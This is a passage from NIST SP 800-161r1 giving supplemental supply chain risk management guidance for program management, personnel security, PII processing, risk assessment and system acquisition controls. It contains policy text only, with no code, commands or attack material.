Level(s): 1, 2, 3
PM-13 SECURITY AND PRIVACY WORKFORCE
Supplemental C-SCRM Guidance: Security and privacy workforce development and improvement should
ensure that relevant C-SCRM topics are integrated into the content and initiatives produced by the program.
Section 2 provides information on C-SCRM roles and responsibilities. NIST SP 800-161 can be used as a
source of topics and activities to include in the security and privacy workforce program.
Level(s): 1, 2
PM-14 TESTING, TRAINING, AND MONITORING
Supplemental C-SCRM Guidance: The enterprise should implement a process to ensure that organizational
plans for conducting supply chain risk testing, training, and monitoring activities associated with
organizational systems are maintained. The C-SCRM PMO can provide guidance and support on how to
integrate C-SCRM into testing, training, and monitoring plans.
Level(s): 1, 2
PM-15 SECURITY AND PRIVACY GROUPS AND ASSOCIATIONS
Supplemental C-SCRM Guidance: Contact with security and privacy groups and associations should
include C-SCRM practitioners and those with C-SCRM responsibilities. Acquisition, legal, critical
infrastructure, and supply chain groups and associations should be incorporated. The C-SCRM PMO can
help identify agency personnel who could benefit from participation, specific groups to participate in, and
relevant topics.
Level(s): 1, 2
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
125
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
PM-16 THREAT AWARENESS PROGRAM
Supplemental C-SCRM Guidance: A threat awareness program should include threats that emanate from
the supply chain. When addressing supply chain threat awareness, knowledge should be shared between
stakeholders within the boundaries of the enterprise’s information sharing policy. The C-SCRM PMO can
help identify C-SCRM stakeholders to include in threat information sharing, as well as potential sources of
information for supply chain threats.
Level(s): 1, 2
PM-17 PROTECTING CONTROLLED UNCLASSIFIED INFORMATION ON EXTERNAL SYSTEMS
Supplemental C-SCRM Guidance: The policy and procedures for controlled unclassified information (CUI)
on external systems should include protecting relevant supply chain information. Conversely, it should
include protecting agency information that resides in external systems because such external systems are
part of the agency supply chain.
Level(s): 2
PM-18 PRIVACY PROGRAM PLAN
Supplemental C-SCRM Guidance: The privacy program plan should include C-SCRM. Enterprises should
require their prime contractors to implement this control and flow down this requirement to relevant sub-
tier contractors.
Level(s): 1, 2
PM-19 PRIVACY PROGRAM LEADERSHIP ROLE
Supplemental C-SCRM Guidance: The privacy program leadership role should be included as a stakeholder
in applicable C-SCRM initiatives and activities.
Level(s): 1
PM-20 DISSEMINATION OF PRIVACY PROGRAM INFORMATION
Supplemental C-SCRM Guidance: The dissemination of privacy program information should be protected
from cybersecurity risks throughout the supply chain.
Level(s): 1, 2
PM-21 ACCOUNTING OF DISCLOSURES
Supplemental C-SCRM Guidance: An accounting of disclosures should be protected from cybersecurity
risks throughout the supply chain.
Level(s): 1, 2
PM-22 PERSONALLY IDENTIFIABLE INFORMATION QUALITY MANAGEMENT
Supplemental C-SCRM Guidance: Personally identifiable information (PII) quality management should
take into account and manage cybersecurity risks related to PII throughout the supply chain.
Level(s): 1, 2
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
126
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
PM-23 DATA GOVERNANCE BODY
Supplemental C-SCRM Guidance: Data governance body is a stakeholder in C-SCRM and should be
included in cross-agency collaboration and information sharing of C-SCRM activities and initiatives (e.g.,
by participating in inter-agency bodies, such as the FASC).
Level(s): 1
PM-25 MINIMIZATION OF PERSONALLY IDENTIFIABLE INFORMATION USED IN TESTING,
TRAINING, AND RESEARCH
Supplemental C-SCRM Guidance: Supply chain-related cybersecurity risks to personally identifiable
information should be addressed by the minimization policies and procedures described in this control.
Level(s): 2
PM-26 COMPLAINT MANAGEMENT
Supplemental C-SCRM Guidance: Complaint management process and mechanisms should be protected
from cybersecurity risks throughout the supply chain. Enterprises should also integrate C-SCRM security
and privacy controls when fielding complaints from vendors or the general public (e.g., departments and
agencies fielding inquiries related to exclusions and removals).
Level(s): 2, 3
PM-27 PRIVACY REPORTING
Supplemental C-SCRM Guidance: Privacy reporting process and mechanisms should be protected from
cybersecurity risks throughout the supply chain.
Level(s): 2, 3
PM-28 RISK FRAMING
Supplemental C-SCRM Guidance: C-SCRM should be included in risk framing. Section 2 and Appendix C
provide detailed guidance on integrating C-SCRM into risk framing.
Level(s): 1
PM-29 RISK MANAGEMENT PROGRAM LEADERSHIP ROLES
Supplemental C-SCRM Guidance: Risk management program leadership roles should include C-SCRM
responsibilities and be included in C-SCRM collaboration across the enterprise. Section 2 and Appendix C
provide detailed guidance for C-SCRM roles and responsibilities.
Level(s): 1
PM-30 SUPPLY CHAIN RISK MANAGEMENT STRATEGY
Supplemental C-SCRM Guidance: The Supply Chain Risk Management Strategy (also known as C-SCRM
Strategy) should be complemented with a C-SCRM Implementation Plan that lays out detailed initiatives
and activities for the enterprise with timelines and responsible parties. This implementation plan can be a
POA&M or be included in a POA&M. Based on the C-SCRM Strategy and Implementation Plan at Level
1, the enterprise should select and document common C- SCRM controls that should address the enterprise,
program, and system-specific needs. These controls should be iteratively integrated into the C-SCRM
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
127
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Policy at Level 1 and Level 2, as well as the C-SCRM plan (or SSP if required) at Level 3. See Section 2
and Appendix C for further guidance on risk management.
Level(s): 1, 2
Related Controls: PL-2
PM-31 CONTINUOUS MONITORING STRATEGY
Supplemental C-SCRM Guidance: The continuous monitoring strategy and program should integrate C-
SCRM controls at Levels 1, 2, and 3 in accordance with the Supply Chain Risk Management Strategy.
Level(s): 1, 2, 3
Related Controls: PM-30
PM-32 PURPOSING
Supplemental C-SCRM Guidance: Extending systems assigned to support specific mission or business
functions beyond their initial purpose subjects those systems to unintentional risks, including cybersecurity
risks throughout the supply chain. The application of this control should include the explicit incorporation
of cybersecurity supply chain exposures.
Level(s): 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
128
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: PERSONNEL SECURITY
[FIPS 200] specifies the Personnel Security minimum security requirement as follows:
Organizations must: (i) ensure that individuals occupying positions of responsibility
within organizations (including third-party service providers) are trustworthy and meet
established security criteria for those positions; (ii) ensure that organizational
information and information systems are protected during and after personnel actions
such as terminations and transfers; and (iii) employ formal sanctions for personnel
failing to comply with organizational security policies and procedures.
Personnel who have access to an enterprise’s supply chain should be covered by the enterprise’s
personnel security controls. These personnel include acquisition and contracting professionals,
program managers, supply chain and logistics professionals, shipping and receiving staff,
information technology professionals, quality professionals, mission and business owners,
system owners, and information security engineers. Enterprises should also work with suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers to ensure that they apply appropriate security controls to the personnel who
interact with the enterprise’s supply chain, as appropriate.
PS-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: At each level, the personnel security policy and procedures and the
related C-SCRM Strategy/Implementation Plan, C-SCRM Policies, and C-SCRM Plan(s) need to define the
roles for the personnel who are engaged in the acquisition, management, and execution of supply chain
security activities. These roles also need to state acquirer personnel responsibilities with regard to
relationships with suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers. Policies and procedures need to consider the full system development
life cycle of systems and the roles and responsibilities needed to address the various supply chain
infrastructure activities.
Level 1: Applicable roles include risk executive, CIO, CISO, contracting, logistics, delivery/receiving,
acquisition security, and other functions that provide supporting supply chain activities.
Level 2: Applicable roles include program executive and individuals (e.g., non-federal employees,
including contractors) within the acquirer enterprise who are responsible for program success (e.g.,
Program Manager and other individuals).
Level 3: Applicable roles include system engineers or system security engineers throughout the operational
system life cycle from requirements definition, development, test, deployment, maintenance, updates,
replacements, delivery/receiving, and IT.
Roles for the supplier, developer, system integrator, external system service provider, and other ICT/OT-
related service provider personnel responsible for the success of the program should be noted in an
agreement between the acquirer and these parties (e.g., contract).
The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
129
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 1, 2, 3
Related Control(s): SA-4
PS-3
PERSONNEL SCREENING
Supplemental C-SCRM Guidance: To mitigate insider threat risk, personnel screening policies and
procedures should be extended to any contractor personnel with authorized access to information systems,
system components, or information system services. Continuous monitoring activities should be
commensurate with the contractor’s level of access to sensitive, classified, or regulated information and
should be consistent with broader enterprise policies. Screening requirements should be incorporated into
agreements and flow down to sub-tier contractors.
Level(s): 2, 3
PS-6
ACCESS AGREEMENTS
Supplemental C-SCRM Guidance: The enterprise should define and document access agreements for all
contractors or other external personnel who may need to access the enterprise’s data, systems, or network,
whether physically or logically. Access agreements should state the appropriate level and method of access
to the information system and supply chain network. Additionally, terms of access should be consistent
with the enterprise’s information security policy and may need to specify additional restrictions, such as
allowing access during specific timeframes, from specific locations, or only by personnel who have
satisfied additional vetting requirements. The enterprise should deploy audit mechanisms to review,
monitor, update, and track access by these parties in accordance with the access agreement. As personnel
vary over time, the enterprise should implement a timely and rigorous personnel security update process for
the access agreements.
When information systems and network products and services are provided by an entity within the
enterprise, there may be an existing access agreement in place. When such an agreement does not exist, it
should be established.
NOTE: While the audit mechanisms may be implemented in Level 3, the agreement process with required
updates should be implemented at Level 2 as a part of program management activities.
The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 2, 3
PS-7
EXTERNAL PERSONNEL SECURITY
Supplemental C-SCRM Guidance: Third-party personnel who have access to the enterprise’s information
systems and networks must meet the same personnel security requirements as enterprise personnel.
Examples of such third-party personnel can include the system integrator, developer, supplier, external
service provider used for delivery, contractors or service providers who are using the ICT/OT systems, or
supplier maintenance personnel brought in to address component technical issues not solvable by the
enterprise or system integrator.
Level(s): 2
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
130
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: PERSONALLY IDENTIFIABLE INFORMATION PROCESSING AND
TRANSPARENCY
Personally identifiable information processing and transparency is a new control family
developed specifically to address PII processing and transparency concerns.
The enterprise should keep in mind that some suppliers have comprehensive security and privacy
practices and systems that may go above and beyond the enterprise’s requirements. The
enterprises should work with suppliers to understand the extent of their privacy practices and
how they meet the enterprise’s needs.
PT-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Enterprises should ensure that supply chain concerns are included in PII
processing and transparency policies and procedures, as well as the related C-SCRM
Strategy/Implementation Plan, C-SCRM Policies, and C-SCRM Plan. The policy can be included as part of
the general security and privacy policy or can be represented by multiple policies.
The procedures can be established for the security and privacy program in general and individual
information systems. These policy and procedures should address the purpose, scope, roles, responsibilities,
management commitment, coordination among enterprise entities, and privacy compliance to support
systems/components within information systems or the supply chain.
Policies and procedures need to be in place to ensure that contracts state what PII data will be shared,
which contractor personnel may have access to the PII, controls protecting PII, how long it can be kept, and
what happens to it at the end of a contract.
a.
When working with a new supplier, ensure that the agreement includes the most recent set of
applicable security requirements.
b. Contractors need to abide by relevant laws and policies regarding information (PII and other sensitive
information).
c.
The enterprise should require its prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
131
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: RISK ASSESSMENT
[FIPS 200] specifies the Risk Assessment minimum security requirement as follows:
Organizations must periodically assess the risk to organizational operations (including
mission, functions, image, or reputation), organizational assets, and individuals,
resulting from the operating of organizational information systems and the associated
processing, storage, or transmission of organizational information.
This document provides guidance for managing an enterprise’s cybersecurity risk in supply
chains and expands this control to integrate assessments of cybersecurity risk in supply chains,
as described in Section 2 and Appendix C.
RA-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: Risk assessments should be performed at the enterprise,
mission/program, and operational levels. The system-level risk assessment should include both the supply
chain infrastructure (e.g., development and testing environments and delivery systems) and the information
system/components traversing the supply chain. System-level risk assessments significantly intersect with
the SDLC and should complement the enterprise’s broader RMF activities, which take part during the
SDLC. A criticality analysis will ensure that mission-critical functions and components are given higher
priority due to their impact on the mission, if compromised. The policy should include supply chain-
relevant cybersecurity roles that are applicable to performing and coordinating risk assessments across the
enterprise (see Section 2 for the listing and description of roles). Applicable roles within suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers should be defined.
Level(s): 1, 2, 3
RA-2
SECURITY CATEGORIZATION
Supplemental C-SCRM Guidance: Security categorization is critical to C-SCRM at Levels 1, 2, and 3. In
addition to [FIPS 199] categorization, security categorization for C-SCRM should be based on the
criticality analysis that is performed as part of the SDLC. See Section 2 and [NISTIR 8179] for a detailed
description of criticality analysis.
Level(s): 1, 2, 3
Related Controls: RA-9
RA-3
RISK ASSESSMENT
Supplemental C-SCRM Guidance: Risk assessments should include an analysis of criticality, threats,
vulnerabilities, likelihood, and impact, as described in detail in Appendix C. The data to be reviewed and
collected includes C-SCRM-specific roles, processes, and the results of system/component and services
acquisitions, implementation, and integration. Risk assessments should be performed at Levels 1, 2, and 3.
Risk assessments at higher levels should consist primarily of a synthesis of various risk assessments
performed at lower levels and used for understanding the overall impact with the level (e.g., at the
enterprise or mission/function levels). C-SCRM risk assessments should complement and inform risk
assessments, which are performed as ongoing activities throughout the SDLC, and processes should be
appropriately aligned with or integrated into ERM processes and governance.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
132
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Related Control(s): RA-3(1)
RA-5
VULNERABILITY MONITORING AND SCANNING
Supplemental C-SCRM Guidance: Vulnerability monitoring should cover suppliers, developers, system
integrators, external system service providers, and other ICT/OT-related service providers in the
enterprise’s supply chain. This includes employing data collection tools to maintain a continuous state of
awareness about potential vulnerability to suppliers, as well as the information systems, system
components, and raw inputs that they provide through the cybersecurity supply chain. Vulnerability
monitoring activities should take place at all three levels of the enterprise. Scoping vulnerability monitoring
activities requires enterprises to consider suppliers as well as their sub-suppliers. Enterprises, where
applicable and appropriate, may consider providing customers with a Vulnerability Disclosure Report
(VDR) to demonstrate proper and complete vulnerability assessments for components listed in SBOMs.
The VDR should include the analysis and findings describing the impact (or lack of impact) that the
reported vulnerability has on a component or product. The VDR should also contain information on plans
to address the CVE. Enterprises should consider publishing the VDR within a secure portal available to
customers and signing the VDR with a trusted, verifiable, private key that includes a timestamp indicating
the date and time of the VDR signature and associated VDR. Enterprises should also consider establishing
a separate notification channel for customers in cases where vulnerabilities arise that are not disclosed in
the VDR. Enterprises should require their prime contractors to implement this control and flow down this
requirement to relevant sub-tier contractors. Departments and agencies should refer to Appendix F to
implement this guidance in accordance with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 2, 3
Control Enhancement(s):
VULNERABILITY MONITORING AND SCANNING | BREADTH AND DEPTH OF COVERAGE
Supplemental C-SCRM Guidance: Enterprises that monitor the supply chain for vulnerabilities should
express the breadth of monitoring based on the criticality and/or risk profile of the supplier or
product/component and the depth of monitoring based on the level of the supply chain at which the
monitoring takes place (e.g., sub-supplier). Where possible, a component inventory (e.g., hardware,
software) may aid enterprises in capturing the breadth and depth of the products/components within
their supply chain that may need to be monitored and scanned for vulnerabilities.
Level(s): 2, 3
VULNERABILITY MONITORING AND SCANNING | AUTOMATED TREND ANALYSIS
Supplemental C-SCRM Guidance: Enterprises should track trends in vulnerabilities to components
within the supply chain over time. This information may help enterprises develop procurement
strategies that reduce risk exposure density within the supply chain.
Level(s): 2, 3
RA-7
RISK RESPONSE
Supplemental C-SCRM Guidance: Enterprises should integrate capabilities to respond to cybersecurity
risks throughout the supply chain into the enterprise’s overall response posture, ensuring that these
responses are aligned to and fall within the boundaries of the enterprise’s tolerance for risk. Risk response
should include consideration of risk response identification, evaluation of alternatives, and risk response
decision activities.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
133
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Level(s): 1, 2, 3
RA-9
CRITICALITY ANALYSIS
Supplemental C-SCRM Guidance: Enterprises should complete a criticality analysis as a prerequisite input
to assessments of cybersecurity supply chain risk management activities. First, enterprises should complete
a criticality analysis as part of the Frame step of the C-SCRM Risk Management Process. Then, findings
generated in the Assess step activities (e.g., criticality analysis, threat analysis, vulnerability analysis, and
mitigation strategies) update and tailor the criticality analysis. A symbiotic relationship exists between the
criticality analysis and other Assess step activities in that they inform and enhance one another. For a high-
quality criticality analysis, enterprises should employ it iteratively throughout the SLDC and concurrently
across the three levels. Enterprises should require their prime contractors to implement this control and
flow down this requirement to relevant sub-tier contractors. Departments and agencies should also refer to
Appendix F to supplement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
Level(s): 1, 2, 3
RA-10 THREAT HUNTING
Supplemental C-SCRM Guidance: The C-SCRM threat hunting activities should supplement the
enterprise’s internal threat hunting activities. As a critical part of the cybersecurity supply chain risk
management process, enterprises should actively monitor for threats to their supply chain. This requires a
collaborative effort between C-SCRM and other cyber defense-oriented functions within the enterprise.
Threat hunting capabilities may also be provided via a shared services enterprise, especially when an
enterprise lacks the resources to perform threat hunting activities themselves. Typical activities include
information sharing with peer enterprises and actively consuming threat intelligence sources (e.g., like
those available from Information Assurance and Analysis Centers [ISAC[ and Information Assurance and
Analysis Organizations [ISAO]). These activities can help identify and flag indicators of increased
cybersecurity risks throughout the supply chain that may be of concern, such as cyber incidents, mergers
and acquisitions, and Foreign Ownership, Control, or Influence (FOCI). Supply chain threat intelligence
should seek out threats to the enterprise’s suppliers, as well as information systems, system components,
and the raw inputs that they provide. The intelligence gathered enables enterprises to proactively identify
and respond to threats emanating from the supply chain.
Level(s): 1, 2, 3
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
134
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
FAMILY: SYSTEM AND SERVICES ACQUISITION
[FIPS 200] specifies the System and Services Acquisition minimum security requirement as
follows:
Organizations must: (i) allocate sufficient resources to adequately protect
organizational information systems; (ii) employ system development life cycle
processes that incorporate information security considerations; (iii) employ software
usage and installation restrictions; and (iv) ensure that third-party providers employ
adequate security measures to protect information, applications, and/or services
outsourced from the organization.
Enterprises acquire ICT/OT products and services through system and services acquisition.
These controls address the activities of acquirers, suppliers, developers, system integrators,
external system service providers, other ICT/OT-related service providers, and related
upstream supply chain relationships. They address both the physical and logical aspects of
supply chain security, from detection to SDLC and security engineering principles. C-SCRM
concerns are already prominently addressed in [NIST SP 800-53, Rev. 5]. This document adds
further detail and refinement to these controls.
SA-1
POLICY AND PROCEDURES
Supplemental C-SCRM Guidance: The system and services acquisition policy and procedures should
address C-SCRM throughout the acquisition management life cycle process, to include purchases made via
charge cards. C-SCRM procurement actions and the resultant contracts should include requirements
language or clauses that address which controls are mandatory or desirable and may include
implementation specifications, state what is accepted as evidence that the requirement is satisfied, and how
conformance to requirements will be verified and validated. C-SCRM should also be included as an
evaluation factor.
These applicable procurements should not be limited to those that are directly related to providing an
ICT/OT product or service. While C-SCRM considerations must be applied to these purchases, C-SCRM
should also be considered for any and all procurements of products or services in which there may be an
unacceptable risk of a supplied product or service contractor compromising the integrity, availability, or
confidentiality of an enterprise’s information. This initial assessment should occur during the acquisition
planning phase and will be minimally informed by an identification and understanding of the criticality of
the enterprise’s mission functions, its high value assets, and the sensitivity of the information that may be
accessible by the supplied product or service provider.
In addition, enterprises should develop policies and procedures that address supply chain risks that may
arise during contract performance, such as a change of ownership or control of the business or when
actionable information is learned that indicates that a supplier or a product is a target of a supply chain
threat. Supply chains evolve continuously through mergers and acquisitions, joint ventures, and other
partnership agreements. The policy should help enterprises understand these changes and use the obtained
information to inform their C-SCRM activities. Enterprises can obtain the status of such changes through,
for example, monitoring public announcements about company activities or any communications initiated
by suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
135
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
See Section 3 for further guidance on C-SCRM in the federal acquisition process. Additionally,
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 1, 2, 3
SA-2
ALLOCATION OF RESOURCES
Supplemental C-SCRM Guidance: The enterprise should incorporate C-SCRM requirements when
determining and establishing the allocation of resources.
Level(s): 1, 2
SA-3
SYSTEM DEVELOPMENT LIFE CYCLE
Supplemental C-SCRM Guidance: There is a strong relationship between the SDLC and C-SCRM
activities. The enterprise should ensure that C-SCRM activities are integrated into the SDLC for both the
enterprise and for applicable suppliers, developers, system integrators, external system service providers,
and other ICT/OT-related service providers. In addition to traditional SDLC activities, such as requirements
and design, the SDLC includes activities such as inventory management, acquisition and procurement, and
the logical delivery of systems and components. See Section 2 and Appendix C for further guidance on
SDLC. Departments and agencies should refer to Appendix F to implement this guidance in accordance
with Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
SA-4
ACQUISITION PROCESS
Supplemental C-SCRM Guidance: Enterprises are to include C-SCRM requirements, descriptions, and
criteria in applicable contractual agreements.
1. Enterprises are to establish baseline and tailorable C-SCRM requirements to apply and incorporate
into contractual agreements when procuring a product or service from suppliers, developers,
system integrators, external system service providers, and other ICT/OT-related service providers.
These include but are not limited to:
a.
C-SCRM requirements that cover regulatory mandates (e.g., the prohibition of certain
ICT/OT or suppliers) address identified and selected controls that are applicable to reducing
cyber supply chain risk that may be introduced by a procured product or service and that
provide assurance that the contractor is sufficiently responsible, capable, and trustworthy.
b. Requirements for critical elements in the supply chain to demonstrate the capability to
remediate emerging vulnerabilities based on open source information and other sources.
c.
Requirements for managing intellectual property ownership and responsibilities for elements
such as software code; data and information; the manufacturing, development, or integration
environment; designs; and proprietary processes when provided to the enterprise for review or
use.
d. Requirements that address the expected life span of the product or system, any element(s) that
may be in a critical path based on their life span, and what is required when end-of-life is near
or has been reached. Enterprises should conduct research or solicit information from bidders
or existing providers under contract to understand what end-of-life options exist (e.g., replace,
upgrade, migrate to a new system, etc.).
e.
Articulate any circumstances when secondary market components may be permitted.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
136
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
f.
Requirements for functional properties, configuration, and implementation information, as
well as any development methods, techniques, or practices that may be relevant. Identify and
specify C-SCRM evaluation criteria, to include the weighting of such criteria.
2. Enterprises should:
a.
Establish a plan for the acquisition of spare parts to ensure adequate supply, and execute the
plan if or when applicable;
b. Establish a plan for the acquisition of alternative sources of supply as may be necessary
during continuity events or if/when a disruption to the supply chain occurs;
c.
Work with suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers to identify and define existing and acceptable incident
response and information-sharing processes, including inputs on vulnerabilities from other
enterprises within their supply chains.
3. Establish and maintain verification procedures and acceptance criteria for delivered products and
services, which include but are not limited to:
a.
Accepting COTS and GOTS products without verification, as authorized by the enterprise
(e.g., approved products lists)
b. Supplier validation of developmental and COTS software and hardware information system
vulnerabilities
4. Ensure that the continuous monitoring plan includes supply chain aspects in its criteria, such as
including the monitoring of functions, ports, and protocols in use. See Section 2 and Appendix C.
5. Ensure that the contract addresses the monitoring of suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers’ information
systems located within the supply chain infrastructure. Monitor and evaluate the acquired work
processes and work products where applicable. These include but are not limited to monitoring
software development infrastructure for vulnerabilities (e.g., DevSecOps pipelines, software
containers, and code repositories/shares).
6. Communicate processes for reporting information security weaknesses and vulnerabilities detected
during the use of ICT/OT products or services, and ensure reporting to appropriate stakeholders,
including OEMs where relevant.
7. Review and confirm sustained compliance with the terms and conditions of the agreement on an
ongoing basis.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
Related Controls: SA-4 (1), (2), (3), (6), and (7)
Control Enhancement(s):
ACQUISITION PROCESS | SYSTEM, COMPONENT, AND SERVICE CONFIGURATIONS
Supplemental C-SCRM Guidance: If an enterprise needs to purchase components, they need to ensure
that the product specifications are “fit for purpose” and meet the enterprise’s requirements, whether
purchasing directly from the OEM, channel partners, or a secondary market.
Level(s): 3
ACQUISITION PROCESS | NIAP-APPROVED PROTECTION PROFILES
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
137
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Supplemental C-SCRM Guidance: This control enhancement requires that the enterprise build,
procure, and/or use U.S. Government protection profile-certified information assurance (IA)
components when possible. NIAP certification can be achieved for OTS (COTS and GOTS).
Level(s): 2, 3
ACQUISITION PROCESS | CONTINUOUS MONITORING PLAN FOR CONTROLS
Supplemental C-SCRM Guidance: This control enhancement is relevant to C-SCRM and plans for
continuous monitoring of control effectiveness and should therefore be extended to suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related service
providers.
Level(s): 2, 3
SA-5
SYSTEM DOCUMENTATION
Supplemental C-SCRM Guidance: Information system documentation should include relevant C-SCRM
concerns (e.g., C-SCRM plan). Departments and agencies should refer to Appendix F to implement this
guidance in accordance with Executive Order 14028 on Improving the Nation's Cybersecurity.
Level(s): 3
SA-8
SECURITY AND PRIVACY ENGINEERING PRINCIPLES
Supplemental C-SCRM Guidance: The following security engineering techniques are helpful for managing
cybersecurity risks throughout the supply chain.
a.
Anticipate the maximum possible ways that the ICT/OT product or service can be misused or
abused in order to help identify how to protect the product or system from such uses. Address
intended and unintended use scenarios in architecture and design.
b. Design network and security architectures, systems, and components based on the enterprise’s risk
tolerance, as determined by risk assessments (see Section 2 and Appendix C).
c.
Document and gain management acceptance and approval for risk that is not fully mitigated.
d. Limit the number, size, and privilege levels of critical elements. Using criticality analysis will aid
in determining which elements or functions are critical. See criticality analysis in Appendix C and
NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and Components.
e.
Use security mechanisms that help to reduce opportunities to exploit supply chain cybersecurity
vulnerabilities, such as encryption, access control, identity management, and malware or
tampering discovery.
f.
Design information system components and elements to be difficult to disable (e.g., tamper-
proofing techniques), and if they are disabled, trigger notification methods such as audit trails,
tamper evidence, or alarms.
g. Design delivery mechanisms (e.g., downloads for software) to avoid unnecessary exposure or
access to the supply chain and the systems/components traversing the supply chain during
delivery.
h. Design relevant validation mechanisms to be used during implementation and operation.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
SA-9
EXTERNAL SYSTEM SERVICES
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
138
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Supplemental C-SCRM Guidance: C-SCRM supplemental guidance is provided in the control
enhancements.
Control Enhancement(s):
(1)
EXTERNAL SYSTEM SERVICES | RISK ASSESSMENTS AND ORGANIZATIONAL APPROVALS
Supplemental C-SCRM Guidance: See Appendices C and D. Departments and agencies should refer to
Appendix E and Appendix F to implement guidance in accordance with Executive Order 14028 on
Improving the Nation's Cybersecurity.
Level(s): 2, 3
(2)
EXTERNAL SYSTEM SERVICES | ESTABLISH AND MAINTAIN TRUST RELATIONSHIP WITH PROVIDERS
Supplemental C-SCRM Guidance: Relationships with providers37 should meet the following supply
chain security requirements:
a.
The requirements definition is complete and reviewed for accuracy and completeness, including
the assignment of criticality to various components and defining operational concepts and
associated scenarios for intended and unintended use.
b. Requirements are based on needs, relevant compliance drivers, criticality analysis, and
assessments of cybersecurity risks throughout the supply chain.
c.
Cyber supply chain threats, vulnerabilities, and associated risks are identified and documented.
d. Enterprise data and information integrity, confidentiality, and availability requirements are defined
and shared with the system suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers as appropriate.
e.
The consequences of non-compliance with C-SCRM requirements and information system
security requirements are defined and documented.
f.
There is a clear delineation of accountabilities, roles, and responsibilities between contractors
when multiple disparate providers are engaged in supporting a system or mission and business
function.
g. The requirements detail service contract completion and what defines the end of the suppliers,
developers, system integrators, external system service providers, or other ICT/OT-related service
providers’ relationship. This is important to know for re-compete, potential change in provider,
and to manage system end-of-life processes.
h. Establish negotiated agreements for relationship termination to ensure a safe and secure
termination, such as removing data from cloud environments.
Departments and agencies should refer to Appendix F to implement this guidance in accordance with
Executive Order 14028, Improving the Nation’s Cybersecurity.
Level(s): 1, 2, 3
(3)
EXTERNAL SYSTEM SERVICES | CONSISTENT INTERESTS OF CONSUMERS AND PROVIDERS
Supplemental C-SCRM Guidance: In the context of this enhancement, “providers” may include
suppliers, developers, system integrators, external system service providers, and other ICT/OT-related
service providers.
Level(s): 3
(4)
EXTERNAL SYSTEM SERVICES | PROCESSING, STORAGE, AND SERVICE LOCATION
